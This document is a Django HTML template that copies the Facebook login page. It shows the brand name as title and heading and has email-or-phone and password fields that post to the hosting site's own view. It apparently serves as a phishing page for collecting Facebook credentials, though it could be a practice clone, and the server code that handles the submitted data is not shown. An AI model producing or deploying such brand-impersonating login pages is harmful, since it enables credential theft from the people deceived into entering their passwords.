<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    {% load static %}
    <link rel="stylesheet" href="{% static 'fb.css' %}">
    <link rel="stylesheet" media="screen and (max-width:370px)" href="{% static 'fbphon.css' %}">
    <title>FACEBOOK</title>
</head>

<body>
    <div class="main_div">
        <div class="box">
            <h1>FACEBOOK</h1>
            <form action="" method="post">
                {% csrf_token %}
                <div class="inputbox">
                    <input type="text" name="user" autocomplete="off" required placeholder="Email or phone number">
                </div>
                <div class="inputbox">
                    <input type="password" name="password" autocomplete="off" required placeholder="Password">
                </div>
                <button type="submit" class="but">Login</button>
            </form>
        </div>
    </div>
</body>

</html>